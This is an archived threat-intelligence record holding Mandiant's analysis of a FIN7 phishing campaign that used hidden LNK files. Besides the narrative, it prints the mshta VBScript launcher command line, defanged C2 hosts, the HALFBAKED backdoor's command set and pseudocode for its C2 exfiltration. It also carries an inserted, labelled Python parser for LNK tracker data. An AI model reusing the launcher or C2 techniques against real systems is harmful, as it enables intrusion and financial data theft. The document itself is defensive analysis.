{
	"id": "03d16aed-8e48-49ce-b697-104b459c4ba6",
	"created_at": "2026-04-06T00:09:04.312715Z",
	"updated_at": "2026-04-10T03:35:53.035043Z",
	"deleted_at": null,
	"sha1_hash": "072218900503798227d428dfbb797f8c1fd5e395",
	"title": "FIN7 Evolution and the Phishing LNK | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 750247,
	"plain_text": "FIN7 Evolution and the Phishing LNK | Mandiant\r\nBy Mandiant\r\nPublished: 2017-04-24 · Archived: 2026-04-02 10:43:12 UTC\r\nWritten by: Nick Carr, Saravanan Mohankumar, Yogesh Londhe, Barry Vengerik, Dominik Weber\r\nFIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late\r\n2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the\r\nCARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting\r\npersonnel involved with United States Securities and Exchange Commission (SEC) filings at various\r\norganizations.\r\nIn a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and\r\npersistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade\r\ndetection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection\r\nand VBScript functionality launched by mshta.exe to infect the victim.\r\nIn this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious\r\nDOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from\r\nexternal email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant\r\nchains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints,\r\ncatering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report,\r\nFIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them\r\nthrough the infection process.\r\nInfection Chain\r\nWhile FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching\r\nmechanisms. 
In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click\r\non the image in the document, as seen in Figure 1. This launches the hidden malicious LNK file embedded in the\r\ndocument. Overall, this is a more effective phishing tactic since the malicious content is embedded in the\r\ndocument content rather than packaged in the OLE object.\r\nBy requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security\r\nwarning popup – the phishing lure attempts to evade dynamic detection, as many sandboxes are not configured to\r\nsimulate that specific user action.\r\nhttps://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html\r\nPage 1 of 6\n\nFigure 1: Malicious FIN7 lure asking victim to double click to unlock contents\r\nThe malicious LNK launches “mshta.exe” with the following arguments passed to it:\r\nvbscript:Execute(\"On Error Resume Next:set w=GetObject(,\"\"Word.Application\"\"):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close\")\r\nGetObject with an empty first argument attaches to the Word instance that already has the lure open, so the next stage is pulled out of the open document over COM rather than written to disk as its own script file. The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.\r\nFigure 2: Textbox inside DOC\r\nThe combined script from the Word textboxes drops the following components:\r\n\\Users\\[user_name]\\Intel\\58d2a83f7778d5.36783181.vbs\r\n\\Users\\[user_name]\\Intel\\58d2a83f777942.26535794.ps1\r\n\\Users\\[user_name]\\Intel\\58d2a83f777908.23270411.vbs\r\nThe script also creates a named scheduled task for persistence that launches “58d2a83f7778d5.36783181.vbs” every 25\r\nminutes.\r\nVBScript #1\r\nThe dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. 
This VBScript uses WMI queries to check whether the\r\n“58d2a83f777942.26535794.ps1” PowerShell script is already running and, if not, launches it.\r\nPowerShell Script\r\n“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a\r\nCobalt Strike stager.\r\nThe shellcode retrieves an additional payload by connecting to the following C2 server using DNS:\r\naaa.stage.14919005.www1.proslr3[.]com\r\nOnce a successful reply is received from the command and control (C2) server, the PowerShell script executes the\r\nembedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to\r\nreattempt communication with C2 server addresses matching the following pattern:\r\n[a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com\r\nVBScript #2\r\n“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a GUID-named folder\r\ninside “Intel” and drops the VBScript payloads and configuration files:\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777638.60220156.ini\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777688.78384945.ps1\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776b5.64953395.txt\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776e0.72726761.vbs\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777716.48248237.vbs\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777788.86541308.vbs\r\n\\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\Foxconn.lnk\r\nThis script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.\r\nHALFBAKED Backdoor Variant\r\nThe HALFBAKED malware family consists of multiple components designed to establish and maintain a\r\nfoothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. 
This\r\nversion of HALFBAKED connects to the following C2 server, trying three ports:\r\nhxxp://198[.]100.119.6:80/cd\r\nhxxp://198[.]100.119.6:443/cd\r\nhxxp://198[.]100.119.6:8080/cd\r\nThis version of HALFBAKED listens for the following commands from the C2 server:\r\ninfo: Sends victim machine information (OS, processor, BIOS and running processes) gathered using WMI queries\r\nprocessList: Sends the list of running processes\r\nscreenshot: Takes a screenshot of the victim machine (using 58d2a83f777688.78384945.ps1)\r\nrunvbs: Executes a VBScript file\r\nrunexe: Executes an EXE file\r\nrunps1: Executes a PowerShell script\r\ndelete: Deletes the specified file\r\nupdate: Updates the specified file\r\nAll communication between the backdoor and the attacker C2 is encoded using the following technique, represented\r\nin pseudo code:\r\nFunction send_data(data)\r\n    random_string = custom_function_to_generate_random_string()\r\n    encoded_data = URLEncode(SimpleEncrypt(data))\r\n    post_data(\"POST\", random_string \u0026 \"=\" \u0026 encoded_data, Hard_coded_c2_url, Create_Random_Url(class_id))\r\nEnd Function\r\nBecause the POST parameter name is regenerated for every request, it cannot serve as a stable network signature; the hard-coded host and port list above can.\r\nThe FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of\r\na variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor.\r\nPersistence Mechanism\r\nFigure 3 shows that for persistence, the document creates two scheduled tasks and one auto-start registry\r\nentry pointing to the LNK file.\r\nFigure 3: FIN7 phishing lure persistence mechanisms\r\nExamining Attacker Shortcut Files\r\nIn many cases, attacker-created LNK files can reveal valuable information about the attacker’s development\r\nenvironment. These files can be parsed with lnk-parser to extract all contents. 
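As an added example (not code from the Mandiant post), the following Python parser does the part of that job that yields the attribution data: it locates the TrackerDataBlock that Windows appends to a shortcut, decodes the NetBIOS name and droid GUIDs from it, and then unpacks the version 1 UUID used as the file droid into the MAC address, clock sequence and timestamp. The block layout follows MS-SHLLINK section 2.5.10; the sample bytes are constructed here from the values the post reports for one FIN7 shortcut, padded with zero filler in place of the rest of the file, and the VirtualBox check is a plain comparison against the 08:00:27 OUI that VirtualBox assigns to its virtual adapters.

```python
# Added example (not from the Mandiant post): locate the TrackerDataBlock in a
# raw .lnk file and decode the attribution fields the post lists (NetBIOS name,
# droid GUIDs, and the MAC address / timestamp / clock sequence carried by the
# version-1 UUID that Windows uses as the file droid). Layout follows MS-SHLLINK
# section 2.5.10; the sample block below is constructed from the values the post
# reports for one FIN7 shortcut, not extracted from the real file.
import struct
import uuid
from datetime import datetime, timedelta, timezone

TRACKER_SIGNATURE = 0xA0000003   # BlockSignature of the TrackerDataBlock
TRACKER_BLOCK_SIZE = 0x60        # BlockSize is fixed at 96 bytes
UUID_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)  # RFC 4122 v1 epoch
VIRTUALBOX_OUI = '08:00:27'      # OUI used by VirtualBox virtual NICs


def find_tracker_block(lnk_bytes):
    '''Return the 96-byte TrackerDataBlock, or None if the shortcut has none.

    Extra data blocks sit at the end of the file; scanning for the
    size+signature pair avoids parsing the variable-length sections first.
    '''
    needle = struct.pack('<II', TRACKER_BLOCK_SIZE, TRACKER_SIGNATURE)
    pos = lnk_bytes.find(needle)
    if pos < 0 or pos + TRACKER_BLOCK_SIZE > len(lnk_bytes):
        return None
    return lnk_bytes[pos:pos + TRACKER_BLOCK_SIZE]


def parse_tracker_block(block):
    '''Decode MachineID and the four droid GUIDs from a TrackerDataBlock.'''
    size, sig, length, version = struct.unpack_from('<IIII', block, 0)
    if (size, sig) != (TRACKER_BLOCK_SIZE, TRACKER_SIGNATURE):
        raise ValueError('not a TrackerDataBlock')
    # MachineID is a NUL-padded 16-byte NetBIOS name.
    machine_id = block[16:32].split(bytes(1), 1)[0].decode('ascii', 'replace')
    # GUIDs are stored in Windows mixed-endian layout, hence bytes_le.
    guids = [uuid.UUID(bytes_le=block[o:o + 16]) for o in range(32, 96, 16)]
    return {
        'version': version,
        'netbios_name': machine_id,
        'droid_volume': guids[0],
        'droid_file': guids[1],
        'birth_droid_volume': guids[2],
        'birth_droid_file': guids[3],
    }


def decode_uuid_v1(u):
    '''Pull node (MAC), clock sequence and UTC timestamp out of a v1 UUID.'''
    if u.version != 1:
        raise ValueError('not a version-1 UUID: %s' % u)
    mac = ':'.join('%02x' % b for b in u.node.to_bytes(6, 'big'))
    # u.time is 100-ns ticks since the UUID epoch; timedelta takes microseconds.
    when = UUID_EPOCH + timedelta(microseconds=u.time // 10)
    return {
        'mac': mac,
        'likely_virtualbox': mac.startswith(VIRTUALBOX_OUI),
        'clock_seq': u.clock_seq,
        'timestamp_utc': when,
    }


def triage_lnk(lnk_bytes):
    '''Combine both steps; returns None when no tracker block is present.'''
    block = find_tracker_block(lnk_bytes)
    if block is None:
        return None
    info = parse_tracker_block(block)
    info.update(decode_uuid_v1(info['droid_file']))
    return info


def build_sample_block(netbios, droid_vol, droid_file):
    '''Constructed test data: a TrackerDataBlock whose birth droids equal its droids.'''
    vol = uuid.UUID(droid_vol).bytes_le
    fil = uuid.UUID(droid_file).bytes_le
    header = struct.pack('<IIII', TRACKER_BLOCK_SIZE, TRACKER_SIGNATURE, 0x58, 0)
    machine = netbios.encode('ascii').ljust(16, bytes(1))
    return header + machine + vol + fil + vol + fil


# Values the post reports for one FIN7 LNK; the zero bytes around the block are
# filler standing in for the rest of a shortcut file (constructed sample).
SAMPLE_LNK = bytes(76) + build_sample_block(
    'andy-pc',
    'e2c10c40-6f7d-4442-bcec-470c96730bca',
    'a6eea972-0e2f-11e7-8b2d-0800273d5268',
) + bytes(4)

if __name__ == '__main__':
    for key, value in triage_lnk(SAMPLE_LNK).items():
        print('%-20s %s' % (key, value))
```

To run it against a real shortcut, replace SAMPLE_LNK with the file contents; the scan works on raw bytes, so it applies equally to a .lnk carved out of a lure document or a memory image. Note that only the file droid is a time-based UUID; the volume droid is version 4 and carries no MAC or timestamp.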
LNK files have been valuable\r\nduring Mandiant incident response investigations as they include the volume serial number, NetBIOS name, and\r\nMAC address of the machine on which they were created.\r\nFor example, one of these FIN7 LNK files contained the following properties:\r\nVersion: 0\r\nNetBIOS name: andy-pc\r\nDroid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca\r\nDroid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268\r\nBirth droid volume identifier: e2c10c40-6f7d-4442-bcec-470c96730bca\r\nBirth droid file identifier: a6eea972-0e2f-11e7-8b2d-0800273d5268\r\nMAC address: 08:00:27:3d:52:68\r\nUUID timestamp: 03/21/2017 (12:12:28.500) [UTC]\r\nUUID sequence number: 2861\r\nThe MAC address, timestamp and sequence number are decoded from the droid file identifier, which is a version 1 UUID. From this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker\r\nlikely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017: the 08:00:27 prefix of the MAC address is the OUI used by VirtualBox virtual network adapters.\r\nExample Phishing Lures\r\nFilename: Doc33.docx\r\nMD5: 6a5a42ed234910121dbb7d1994ab5a5e\r\nFilename: Mail.rtf\r\nMD5: 1a9e113b2f3caa7a141a94c8bc187ea7\r\nFIN7 April 2017 Community Protection Event\r\nOn April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection\r\nEvent (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our\r\nproduct team – to secure all clients affected by this campaign.\r\nSource: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE",
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
	],
	"report_names": [
		"fin7-phishing-lnk.html"
	],
	"threat_actors": [
		{
			"id": "c9617bb6-45c8-495e-9759-2177e61a8e91",
			"created_at": "2022-10-25T15:50:23.405039Z",
			"updated_at": "2026-04-10T02:00:05.387643Z",
			"deleted_at": null,
			"main_name": "Carbanak",
			"aliases": [
				"Carbanak",
				"Anunak"
			],
			"source_name": "MITRE:Carbanak",
			"tools": [
				"Carbanak",
				"Mimikatz",
				"PsExec",
				"netsh"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9de1979b-40fc-44dc-855d-193edda4f3b8",
			"created_at": "2025-08-07T02:03:24.92723Z",
			"updated_at": "2026-04-10T02:00:03.755516Z",
			"deleted_at": null,
			"main_name": "GOLD LOCUST",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Silicon "
			],
			"source_name": "Secureworks:GOLD LOCUST",
			"tools": [
				"Carbanak"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf",
			"created_at": "2023-01-06T13:46:38.405479Z",
			"updated_at": "2026-04-10T02:00:02.961112Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"ATK32",
				"G0046",
				"G0008",
				"Sangria Tempest",
				"ELBRUS",
				"GOLD NIAGARA",
				"Coreid",
				"Carbanak",
				"Carbon Spider",
				"JokerStash",
				"CARBON SPIDER"
			],
			"source_name": "MISPGALAXY:FIN7",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ed3810b7-141a-4ed0-8a01-6a972b80458d",
			"created_at": "2022-10-25T16:07:23.443259Z",
			"updated_at": "2026-04-10T02:00:04.602946Z",
			"deleted_at": null,
			"main_name": "Carbanak",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider",
				"ELBRUS",
				"G0008",
				"Gold Waterfall",
				"Sangria Tempest"
			],
			"source_name": "ETDA:Carbanak",
			"tools": [
				"AVE_MARIA",
				"Agentemis",
				"AmmyyRAT",
				"Antak",
				"Anunak",
				"Ave Maria",
				"AveMariaRAT",
				"BABYMETAL",
				"BIRDDOG",
				"Backdoor Batel",
				"Batel",
				"Bateleur",
				"BlackMatter",
				"Boostwrite",
				"Cain \u0026 Abel",
				"Carbanak",
				"Cl0p",
				"Cobalt Strike",
				"CobaltStrike",
				"DNSMessenger",
				"DNSRat",
				"DNSbot",
				"DRIFTPIN",
				"DarkSide",
				"FOXGRABBER",
				"FlawedAmmyy",
				"HALFBAKED",
				"JS Flash",
				"KLRD",
				"MBR Eraser",
				"Mimikatz",
				"Nadrac",
				"Odinaff",
				"POWERPIPE",
				"POWERSOURCE",
				"PsExec",
				"SQLRAT",
				"Sekur",
				"Sekur RAT",
				"SocksBot",
				"SoftPerfect Network Scanner",
				"Spy.Agent.ORM",
				"TEXTMATE",
				"TeamViewer",
				"TiniMet",
				"TinyMet",
				"Toshliph",
				"VB Flash",
				"WARPRISM",
				"avemaria",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bfded1cf-be73-44f9-a391-0751c9996f9a",
			"created_at": "2022-10-25T15:50:23.337107Z",
			"updated_at": "2026-04-10T02:00:05.252413Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"FIN7",
				"GOLD NIAGARA",
				"ITG14",
				"Carbon Spider",
				"ELBRUS",
				"Sangria Tempest"
			],
			"source_name": "MITRE:FIN7",
			"tools": [
				"Mimikatz",
				"AdFind",
				"JSS Loader",
				"HALFBAKED",
				"REvil",
				"PowerSploit",
				"CrackMapExec",
				"Carbanak",
				"Pillowmint",
				"Cobalt Strike",
				"POWERSOURCE",
				"RDFSNIFFER",
				"SQLRat",
				"Lizar",
				"TEXTMATE",
				"BOOSTWRITE"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d85adfe3-e1c3-40b0-b8bb-d1bacadc4d82",
			"created_at": "2022-10-25T16:07:23.619566Z",
			"updated_at": "2026-04-10T02:00:04.690061Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"APT-C-11",
				"ATK 32",
				"G0046",
				"Gold Niagara",
				"GrayAlpha",
				"ITG14",
				"TAG-CR1"
			],
			"source_name": "ETDA:FIN7",
			"tools": [
				"7Logger",
				"Agentemis",
				"Anubis Backdoor",
				"Anunak",
				"Astra",
				"BIOLOAD",
				"BIRDWATCH",
				"Bateleur",
				"Boostwrite",
				"CROWVIEW",
				"Carbanak",
				"Cobalt Strike",
				"CobaltStrike",
				"DICELOADER",
				"DNSMessenger",
				"FOWLGAZE",
				"HALFBAKED",
				"JSSLoader",
				"KillACK",
				"LOADOUT",
				"Lizar",
				"Meterpreter",
				"Mimikatz",
				"NetSupport",
				"NetSupport Manager",
				"NetSupport Manager RAT",
				"NetSupport RAT",
				"NetSupportManager RAT",
				"POWERPLANT",
				"POWERSOURCE",
				"RDFSNIFFER",
				"Ragnar Loader",
				"SQLRAT",
				"Sardonic",
				"Sekur",
				"Sekur RAT",
				"TEXTMATE",
				"Tirion",
				"VB Flash",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434144,
	"ts_updated_at": 1775792153,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/072218900503798227d428dfbb797f8c1fd5e395.pdf",
		"text": "https://archive.orkl.eu/072218900503798227d428dfbb797f8c1fd5e395.txt",
		"img": "https://archive.orkl.eu/072218900503798227d428dfbb797f8c1fd5e395.jpg"
	}
}